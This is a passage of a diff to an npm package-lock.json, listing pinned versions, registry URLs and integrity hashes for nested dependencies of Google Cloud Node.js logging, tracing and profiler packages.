">=14.0.0" + }, + "peerDependencies": { + "bunyan": "*" + } + }, + "node_modules/@google-cloud/logging-bunyan/node_modules/agent-base": { + "version": "7.1.0", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.0.tgz", + "integrity": "sha512-o/zjMZRhJxny7OyEF+Op8X+efiELC7k7yOjMzgfzVqOzXqkBkWI79YoTdOtsuWd5BWhAGAuOY/Xa6xpiaWXiNg==", + "dependencies": { + "debug": "^4.3.4" + }, + "engines": { + "node": ">= 14" + } + }, + "node_modules/@google-cloud/logging-bunyan/node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + 
"supports-color": { + "optional": true + } + } + }, + "node_modules/@google-cloud/logging-bunyan/node_modules/gaxios": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/gaxios/-/gaxios-6.1.0.tgz", + "integrity": "sha512-EIHuesZxNyIkUGcTQKQPMICyOpDD/bi+LJIJx+NLsSGmnS7N+xCLRX5bi4e9yAu9AlSZdVq+qlyWWVuTh/483w==", + "dependencies": { + "extend": "^3.0.2", + "https-proxy-agent": "^7.0.1", + "is-stream": "^2.0.0", + "node-fetch": "^2.6.9" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/logging-bunyan/node_modules/gcp-metadata": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-6.0.0.tgz", + "integrity": "sha512-Ozxyi23/1Ar51wjUT2RDklK+3HxqDr8TLBNK8rBBFQ7T85iIGnXnVusauj06QyqCXRFZig8LZC+TUddWbndlpQ==", + "dependencies": { + "gaxios": "^6.0.0", + "json-bigint": "^1.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/logging-bunyan/node_modules/google-auth-library": { + "version": "9.0.0", + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-9.0.0.tgz", + "integrity": "sha512-IQGjgQoVUAfOk6khqTVMLvWx26R+yPw9uLyb1MNyMQpdKiKt0Fd9sp4NWoINjyGHR8S3iw12hMTYK7O8J07c6Q==", + "dependencies": { + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "gaxios": "^6.0.0", + "gcp-metadata": "^6.0.0", + "gtoken": "^7.0.0", + "jws": "^4.0.0", + "lru-cache": "^6.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/logging-bunyan/node_modules/gtoken": { + "version": "7.0.1", + "resolved": "https://registry.npmjs.org/gtoken/-/gtoken-7.0.1.tgz", + "integrity": "sha512-KcFVtoP1CVFtQu0aSk3AyAt2og66PFhZAlkUOuWKwzMLoulHXG5W5wE5xAnHb+yl3/wEFoqGW7/cDGMU8igDZQ==", + "dependencies": { + "gaxios": "^6.0.0", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@google-cloud/logging-bunyan/node_modules/https-proxy-agent": { + "version": "7.0.1", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.1.tgz", + "integrity": "sha512-Eun8zV0kcYS1g19r78osiQLEFIRspRUDd9tIfBCTBPBeMieF/EsJNL8VI3xOIdYRDEkjQnqOYPsZ2DsWsVsFwQ==", + "dependencies": { + "agent-base": "^7.0.2", + "debug": "4" + }, + "engines": { + "node": ">= 14" + } + }, + "node_modules/@google-cloud/logging-bunyan/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/logging-bunyan/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + }, + "node_modules/@google-cloud/logging-bunyan/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/@google-cloud/logging-min": { + "version": "10.4.0", + "resolved": "https://registry.npmjs.org/@google-cloud/logging-min/-/logging-min-10.4.0.tgz", + "integrity": "sha512-TcblDYAATO9hHcDcWYFh+vqt3pAV7Qddaih1JK3cpkzLa+BWjD5gAVAWww8W9Wr5yxOX+8CkssanH/xSS4n76Q==", + "dependencies": { + "@google-cloud/common": "^4.0.0", + "@google-cloud/paginator": 
"^4.0.0", + "@google-cloud/projectify": "^3.0.0", + "@google-cloud/promisify": "^3.0.0", + "arrify": "^2.0.1", + "dot-prop": "^6.0.0", + "eventid": "^2.0.0", + "extend": "^3.0.2", + "gcp-metadata": "^4.0.0", + "google-auth-library": "^8.0.2", + "google-gax": "^3.5.2", + "on-finished": "^2.3.0", + "pumpify": "^2.0.1", + "stream-events": "^1.0.5", + "uuid": "^9.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/@google-cloud/common": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/@google-cloud/common/-/common-4.0.3.tgz", + "integrity": "sha512-fUoMo5b8iAKbrYpneIRV3z95AlxVJPrjpevxs4SKoclngWZvTXBSGpNisF5+x5m+oNGve7jfB1e6vNBZBUs7Fw==", + "dependencies": { + "@google-cloud/projectify": "^3.0.0", + "@google-cloud/promisify": "^3.0.0", + "arrify": "^2.0.1", + "duplexify": "^4.1.1", + "ent": "^2.2.0", + "extend": "^3.0.2", + "google-auth-library": "^8.0.2", + "retry-request": "^5.0.0", + "teeny-request": "^8.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/@google-cloud/paginator": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/@google-cloud/paginator/-/paginator-4.0.1.tgz", + "integrity": "sha512-6G1ui6bWhNyHjmbYwavdN7mpVPRBtyDg/bfqBTAlwr413On2TnFNfDxc9UhTJctkgoCDgQXEKiRPLPR9USlkbQ==", + "dependencies": { + "arrify": "^2.0.0", + "extend": "^3.0.2" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/@google-cloud/projectify": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@google-cloud/projectify/-/projectify-3.0.0.tgz", + "integrity": "sha512-HRkZsNmjScY6Li8/kb70wjGlDDyLkVk3KvoEo9uIoxSjYLJasGiCch9+PqRVDOCGUFvEIqyogl+BeqILL4OJHA==", + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/@google-cloud/promisify": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/@google-cloud/promisify/-/promisify-3.0.1.tgz", + "integrity": "sha512-z1CjRjtQyBOYL+5Qr9DdYIfrdLBe746jRTYfaYU6MeXkqp7UfYs/jX16lFFVzZ7PGEJvqZNqYUEtb1mvDww4pA==", + "engines": { + "node": ">=12" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/duplexify": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/duplexify/-/duplexify-4.1.2.tgz", + "integrity": "sha512-fz3OjcNCHmRP12MJoZMPglx8m4rrFP8rovnk4vT8Fs+aonZoCwGg10dSsQsfP/E62eZcPTMSMP6686fu9Qlqtw==", + "dependencies": { + "end-of-stream": "^1.4.1", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1", + "stream-shift": "^1.0.0" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/gcp-metadata": { + "version": "4.3.1", + "resolved": "https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-4.3.1.tgz", + "integrity": "sha512-x850LS5N7V1F3UcV7PoupzGsyD6iVwTVvsh3tbXfkctZnBnjW5yu5z1/3k3SehF7TyoTIe78rJs02GMMy+LF+A==", + "dependencies": { + "gaxios": "^4.0.0", + "json-bigint": "^1.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/gcp-metadata/node_modules/gaxios": { + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/gaxios/-/gaxios-4.3.3.tgz", + "integrity": "sha512-gSaYYIO1Y3wUtdfHmjDUZ8LWaxJQpiavzbF5Kq53akSzvmVg0RfyOcFDbO1KJ/KCGRFz2qG+lS81F0nkr7cRJA==", + "dependencies": { + "abort-controller": "^3.0.0", + "extend": "^3.0.2", + "https-proxy-agent": "^5.0.0", + "is-stream": "^2.0.0", + "node-fetch": "^2.6.7" + }, + "engines": { + "node": ">=10" + } + }, + 
"node_modules/@google-cloud/logging-min/node_modules/google-auth-library": { + "version": "8.9.0", + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-8.9.0.tgz", + "integrity": "sha512-f7aQCJODJFmYWN6PeNKzgvy9LI2tYmXnzpNDHEjG5sDNPgGb2FXQyTBnXeSH+PAtpKESFD+LmHw3Ox3mN7e1Fg==", + "dependencies": { + "arrify": "^2.0.0", + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "fast-text-encoding": "^1.0.0", + "gaxios": "^5.0.0", + "gcp-metadata": "^5.3.0", + "gtoken": "^6.1.0", + "jws": "^4.0.0", + "lru-cache": "^6.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/google-auth-library/node_modules/gcp-metadata": { + "version": "5.3.0", + "resolved": "https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-5.3.0.tgz", + "integrity": "sha512-FNTkdNEnBdlqF2oatizolQqNANMrcqJt6AAYt99B3y1aLLC8Hc5IOBb+ZnnzllodEEf6xMBp6wRcBbc16fa65w==", + "dependencies": { + "gaxios": "^5.0.0", + "json-bigint": "^1.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/google-gax": { + "version": "3.6.1", + "resolved": "https://registry.npmjs.org/google-gax/-/google-gax-3.6.1.tgz", + "integrity": "sha512-g/lcUjGcB6DSw2HxgEmCDOrI/CByOwqRvsuUvNalHUK2iPPPlmAIpbMbl62u0YufGMr8zgE3JL7th6dCb1Ry+w==", + "dependencies": { + "@grpc/grpc-js": "~1.8.0", + "@grpc/proto-loader": "^0.7.0", + "@types/long": "^4.0.0", + "@types/rimraf": "^3.0.2", + "abort-controller": "^3.0.0", + "duplexify": "^4.0.0", + "fast-text-encoding": "^1.0.3", + "google-auth-library": "^8.0.2", + "is-stream-ended": "^0.1.4", + "node-fetch": "^2.6.1", + "object-hash": "^3.0.0", + "proto3-json-serializer": "^1.0.0", + "protobufjs": "7.2.4", + "protobufjs-cli": "1.1.1", + "retry-request": "^5.0.0" + }, + "bin": { + "compileProtos": "build/tools/compileProtos.js", + "minifyProtoJson": "build/tools/minify.js" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/google-p12-pem": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/google-p12-pem/-/google-p12-pem-4.0.1.tgz", + "integrity": "sha512-WPkN4yGtz05WZ5EhtlxNDWPhC4JIic6G8ePitwUWy4l+XPVYec+a0j0Ts47PDtW59y3RwAhUd9/h9ZZ63px6RQ==", + "dependencies": { + "node-forge": "^1.3.1" + }, + "bin": { + "gp12-pem": "build/src/bin/gp12-pem.js" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/gtoken": { + "version": "6.1.2", + "resolved": "https://registry.npmjs.org/gtoken/-/gtoken-6.1.2.tgz", + "integrity": "sha512-4ccGpzz7YAr7lxrT2neugmXQ3hP9ho2gcaityLVkiUecAiwiy60Ii8gRbZeOsXV19fYaRjgBSshs8kXw+NKCPQ==", + "dependencies": { + "gaxios": "^5.0.1", + "google-p12-pem": "^4.0.0", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/object-hash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-3.0.0.tgz", + "integrity": "sha512-RSn9F68PjH9HqtltsSnqYC1XXoWe9Bju5+213R98cNGttag9q9yAOTzdbsqvIa7aNm5WffBZFpWYr2aWrklWAw==", + "engines": { + "node": ">= 6" + } + }, + 
"node_modules/@google-cloud/logging-min/node_modules/retry-request": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/retry-request/-/retry-request-5.0.2.tgz", + "integrity": "sha512-wfI3pk7EE80lCIXprqh7ym48IHYdwmAAzESdbU8Q9l7pnRCk9LEhpbOTNKjz6FARLm/Bl5m+4F0ABxOkYUujSQ==", + "dependencies": { + "debug": "^4.1.1", + "extend": "^3.0.2" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/teeny-request": { + "version": "8.0.3", + "resolved": "https://registry.npmjs.org/teeny-request/-/teeny-request-8.0.3.tgz", + "integrity": "sha512-jJZpA5He2y52yUhA7pyAGZlgQpcB+xLjcN0eUFxr9c8hP/H7uOXbBNVo/O0C/xVfJLJs680jvkFgVJEEvk9+ww==", + "dependencies": { + "http-proxy-agent": "^5.0.0", + "https-proxy-agent": "^5.0.0", + "node-fetch": "^2.6.1", + "stream-events": "^1.0.5", + "uuid": "^9.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/uuid": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", + "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", + "funding": [ + "https://github.com/sponsors/broofa", + "https://github.com/sponsors/ctavan" + ], + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/@google-cloud/logging/node_modules/@google-cloud/common": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/@google-cloud/common/-/common-5.0.2.tgz", + "integrity": "sha512-V7bmBKYQyu0eVG2BFejuUjlBt+zrya6vtsKdY+JxMM/dNntPF41vZ9+LhOshEUH01zOHEqBSvI7Dad7ZS6aUeA==", + "dependencies": { + "@google-cloud/projectify": "^4.0.0", + "@google-cloud/promisify": "^4.0.0", + "arrify": "^2.0.1", + "duplexify": "^4.1.1", + "extend": "^3.0.2", + "google-auth-library": "^9.0.0", + "html-entities": "^2.5.2", + "retry-request": "^7.0.0", + "teeny-request": "^9.0.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@google-cloud/logging/node_modules/@google-cloud/paginator": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/@google-cloud/paginator/-/paginator-5.0.2.tgz", + "integrity": "sha512-DJS3s0OVH4zFDB1PzjxAsHqJT6sKVbRwwML0ZBP9PbU7Yebtu/7SWMRzvO2J3nUi9pRNITCfu4LJeooM2w4pjg==", + "dependencies": { + "arrify": "^2.0.0", + "extend": "^3.0.2" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@google-cloud/logging/node_modules/@google-cloud/projectify": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/@google-cloud/projectify/-/projectify-4.0.0.tgz", + "integrity": "sha512-MmaX6HeSvyPbWGwFq7mXdo0uQZLGBYCwziiLIGq5JVX+/bdI3SAq6bP98trV5eTWfLuvsMcIC1YJOF2vfteLFA==", + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@google-cloud/logging/node_modules/@google-cloud/promisify": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/@google-cloud/promisify/-/promisify-4.0.0.tgz", + "integrity": "sha512-Orxzlfb9c67A15cq2JQEyVc7wEsmFBmHjZWZYQMUyJ1qivXyMwdyNOs9odi79hze+2zqdTtu1E19IM/FtqZ10g==", + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/logging/node_modules/agent-base": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.1.tgz", + "integrity": 
"sha512-H0TSyFNDMomMNJQBn8wFV5YC/2eJ+VXECwOadZJT554xP6cODZHPX3H9QMQECxvrgiSOP1pHjy1sMWQVYJOUOA==", + "dependencies": { + "debug": "^4.3.4" + }, + "engines": { + "node": ">= 14" + } + }, + "node_modules/@google-cloud/logging/node_modules/debug": { + "version": "4.3.5", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.5.tgz", + "integrity": "sha512-pt0bNEmneDIvdL1Xsd9oDQ/wrQRkXDT4AUWlNZNPKvW5x/jyO9VFXkJUP07vQ2upmw5PlaITaPKc31jK13V+jg==", + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/@google-cloud/logging/node_modules/duplexify": { + "version": "4.1.3", + "resolved": "https://registry.npmjs.org/duplexify/-/duplexify-4.1.3.tgz", + "integrity": "sha512-M3BmBhwJRZsSx38lZyhE53Csddgzl5R7xGJNk7CVddZD6CcmwMCH8J+7AprIrQKH7TonKxaCjcv27Qmf+sQ+oA==", + "dependencies": { + "end-of-stream": "^1.4.1", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1", + "stream-shift": "^1.0.2" + } + }, + "node_modules/@google-cloud/logging/node_modules/gaxios": { + "version": "6.6.0", + "resolved": "https://registry.npmjs.org/gaxios/-/gaxios-6.6.0.tgz", + "integrity": "sha512-bpOZVQV5gthH/jVCSuYuokRo2bTKOcuBiVWpjmTn6C5Agl5zclGfTljuGsQZxwwDBkli+YhZhP4TdlqTnhOezQ==", + "dependencies": { + "extend": "^3.0.2", + "https-proxy-agent": "^7.0.1", + "is-stream": "^2.0.0", + "node-fetch": "^2.6.9", + "uuid": "^9.0.1" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/logging/node_modules/gaxios/node_modules/https-proxy-agent": { + "version": "7.0.4", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.4.tgz", + "integrity": "sha512-wlwpilI7YdjSkWaQ/7omYBMTliDcmCN8OLihO6I9B86g06lMyAoqgoDpV0XqoaPOKj+0DIdAvnsWfyAAhmimcg==", + "dependencies": { + "agent-base": "^7.0.2", + "debug": "4" + }, + "engines": { + "node": ">= 14" + } + }, + "node_modules/@google-cloud/logging/node_modules/gcp-metadata": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-6.1.0.tgz", + "integrity": "sha512-Jh/AIwwgaxan+7ZUUmRLCjtchyDiqh4KjBJ5tW3plBZb5iL/BPcso8A5DlzeD9qlw0duCamnNdpFjxwaT0KyKg==", + "dependencies": { + "gaxios": "^6.0.0", + "json-bigint": "^1.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/logging/node_modules/google-auth-library": { + "version": "9.10.0", + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-9.10.0.tgz", + "integrity": "sha512-ol+oSa5NbcGdDqA+gZ3G3mev59OHBZksBTxY/tYwjtcp1H/scAFwJfSQU9/1RALoyZ7FslNbke8j4i3ipwlyuQ==", + "dependencies": { + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "gaxios": "^6.1.1", + "gcp-metadata": "^6.1.0", + "gtoken": "^7.0.0", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/logging/node_modules/gtoken": { + "version": "7.1.0", + "resolved": "https://registry.npmjs.org/gtoken/-/gtoken-7.1.0.tgz", + "integrity": "sha512-pCcEwRi+TKpMlxAQObHDQ56KawURgyAf6jtIY046fJ5tIv3zDe/LEIubckAO8fj6JnAxLdmWkUfNyulQ2iKdEw==", + "dependencies": { + "gaxios": "^6.0.0", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@google-cloud/logging/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + }, + "node_modules/@google-cloud/logging/node_modules/retry-request": { + 
"version": "7.0.2", + "resolved": "https://registry.npmjs.org/retry-request/-/retry-request-7.0.2.tgz", + "integrity": "sha512-dUOvLMJ0/JJYEn8NrpOaGNE7X3vpI5XlZS/u0ANjqtcZVKnIxP7IgCFwrKTxENw29emmwug53awKtaMm4i9g5w==", + "dependencies": { + "@types/request": "^2.48.8", + "extend": "^3.0.2", + "teeny-request": "^9.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/logging/node_modules/teeny-request": { + "version": "9.0.0", + "resolved": "https://registry.npmjs.org/teeny-request/-/teeny-request-9.0.0.tgz", + "integrity": "sha512-resvxdc6Mgb7YEThw6G6bExlXKkv6+YbuzGg9xuXxSgxJF7Ozs+o8Y9+2R3sArdWdW8nOokoQb1yrpFB0pQK2g==", + "dependencies": { + "http-proxy-agent": "^5.0.0", + "https-proxy-agent": "^5.0.0", + "node-fetch": "^2.6.9", + "stream-events": "^1.0.5", + "uuid": "^9.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/logging/node_modules/uuid": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", + "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", + "funding": [ + "https://github.com/sponsors/broofa", + "https://github.com/sponsors/ctavan" + ], + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/@google-cloud/opentelemetry-cloud-trace-exporter": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@google-cloud/opentelemetry-cloud-trace-exporter/-/opentelemetry-cloud-trace-exporter-2.1.0.tgz", + "integrity": "sha512-6IPFnWG4edDgNfgLxXJjTjNYGAW8ZQ7Oz7eGZJMgQsIiEALNIAk4e/MgccglL3yh5ReONY3YePcGRWQKPbxmUg==", + "dependencies": { + "@google-cloud/opentelemetry-resource-util": "^2.1.0", + "@grpc/grpc-js": "^1.1.8", + "@grpc/proto-loader": "^0.7.0", + "google-auth-library": "^7.0.0", + "google-proto-files": "^3.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0", + "@opentelemetry/core": "^1.0.0", + "@opentelemetry/resources": "^1.0.0", + "@opentelemetry/sdk-trace-base": "^1.0.0" + } + }, + "node_modules/@google-cloud/opentelemetry-resource-util": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@google-cloud/opentelemetry-resource-util/-/opentelemetry-resource-util-2.1.0.tgz", + "integrity": "sha512-/Qqnm6f10e89Txt39qpIhD+LCOF80artYOVwNF1ZAzgJFxBldEniNkf19SR+q9LAp75ZZWKyhRlumM1V7fT8gw==", + "dependencies": { + "gcp-metadata": "^5.0.1" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/resources": "^1.0.0", + "@opentelemetry/semantic-conventions": "^1.0.0" + } + }, + "node_modules/@google-cloud/paginator": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/@google-cloud/paginator/-/paginator-3.0.7.tgz", + "integrity": "sha512-jJNutk0arIQhmpUUQJPJErsojqo834KcyB6X7a1mxuic8i1tKXxde8E69IZxNZawRIlZdIK2QY4WALvlK5MzYQ==", + "dependencies": { + "arrify": "^2.0.0", + "extend": "^3.0.2" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/profiler": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/@google-cloud/profiler/-/profiler-6.0.0.tgz", + "integrity": "sha512-EAxPbDiNRidAKOEnlUK3M+CcOlqG+REkUEZKirLtxFwzI/m7LmGqDzQvrVWTOSFSEYJ9qQRRnO+Q1osNGk3NUg==", + "dependencies": { + "@google-cloud/common": "^5.0.0", + "@google-cloud/logging-min": "^10.0.0", + "@types/console-log-level": "^1.4.0", + "@types/semver": "^7.0.0", + "console-log-level": "^1.4.0", + "delay": "^5.0.0", + "extend": "^3.0.2", + "gcp-metadata": "^6.0.0", + "parse-duration": "^1.0.0", + "pprof": "3.2.1", + 
"pretty-ms": "^7.0.0", + "protobufjs": "~7.2.4", + "semver": "^7.0.0", + "teeny-request": "^9.0.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@google-cloud/profiler/node_modules/@google-cloud/common": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/@google-cloud/common/-/common-5.0.0.tgz", + "integrity": "sha512-IsbTVr7Ag+04GMT87X738vDs85QU1rMvaesm2wEQrtTbZAR92tGmUQ8/D/kdnYgAi98Q4zmfhF+T8Xs/Lw4zAA==", + "dependencies": { + "@google-cloud/projectify": "^4.0.0", + "@google-cloud/promisify": "^4.0.0", + "arrify": "^2.0.1", + "duplexify": "^4.1.1", + "ent": "^2.2.0", + "extend": "^3.0.2", + "google-auth-library": "^9.0.0", + "retry-request": "^6.0.0", + "teeny-request": "^9.0.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@google-cloud/profiler/node_modules/@google-cloud/projectify": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/@google-cloud/projectify/-/projectify-4.0.0.tgz", + "integrity": "sha512-MmaX6HeSvyPbWGwFq7mXdo0uQZLGBYCwziiLIGq5JVX+/bdI3SAq6bP98trV5eTWfLuvsMcIC1YJOF2vfteLFA==", + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@google-cloud/profiler/node_modules/@google-cloud/promisify": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/@google-cloud/promisify/-/promisify-4.0.0.tgz", + "integrity": "sha512-Orxzlfb9c67A15cq2JQEyVc7wEsmFBmHjZWZYQMUyJ1qivXyMwdyNOs9odi79hze+2zqdTtu1E19IM/FtqZ10g==", + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/profiler/node_modules/agent-base": { + "version": "7.1.0", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.0.tgz", + "integrity": "sha512-o/zjMZRhJxny7OyEF+Op8X+efiELC7k7yOjMzgfzVqOzXqkBkWI79YoTdOtsuWd5BWhAGAuOY/Xa6xpiaWXiNg==", + "dependencies": { + "debug": "^4.3.4" + }, + "engines": { + "node": ">= 14" + } + }, + "node_modules/@google-cloud/profiler/node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/@google-cloud/profiler/node_modules/duplexify": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/duplexify/-/duplexify-4.1.2.tgz", + "integrity": "sha512-fz3OjcNCHmRP12MJoZMPglx8m4rrFP8rovnk4vT8Fs+aonZoCwGg10dSsQsfP/E62eZcPTMSMP6686fu9Qlqtw==", + "dependencies": { + "end-of-stream": "^1.4.1", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1", + "stream-shift": "^1.0.0" + } + }, + "node_modules/@google-cloud/profiler/node_modules/gaxios": { + "version": "6.1.1", + "resolved": "https://registry.npmjs.org/gaxios/-/gaxios-6.1.1.tgz", + "integrity": "sha512-bw8smrX+XlAoo9o1JAksBwX+hi/RG15J+NTSxmNPIclKC3ZVK6C2afwY8OSdRvOK0+ZLecUJYtj2MmjOt3Dm0w==", + "dependencies": { + "extend": "^3.0.2", + "https-proxy-agent": "^7.0.1", + "is-stream": "^2.0.0", + "node-fetch": "^2.6.9" + }, + "engines": { + "node": ">=14" + } + }, + 